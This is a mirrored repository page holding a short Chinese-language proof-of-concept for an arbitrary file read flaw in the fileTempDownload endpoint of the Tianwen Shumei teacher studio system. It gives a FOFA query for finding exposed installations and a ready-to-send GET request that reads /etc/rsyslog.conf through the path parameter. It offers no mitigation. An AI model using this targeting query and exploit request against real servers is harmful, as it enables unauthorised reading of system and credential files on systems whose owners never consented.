admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/天闻数媒名师工作室系统/天闻数媒名师工作室系统fileTempDownload任意文件读取.md

467 B
Raw Blame History

天闻数媒名师工作室系统fileTempDownload任意文件读取

一、漏洞简介

天闻数媒名师工作室系统fileTempDownload接口存在任意文件读取漏洞

二、影响版本

  • 天闻数媒名师工作室系统

三、资产测绘

  • fofabody="/static/js/bootstrap/bootstrap.css" && title="名师工作室"

四、漏洞复现

GET /fileUploadAndDownload/fileTempDownload?path=/etc/rsyslog.conf HTTP/1.1
Host: 127.0.0.1:8080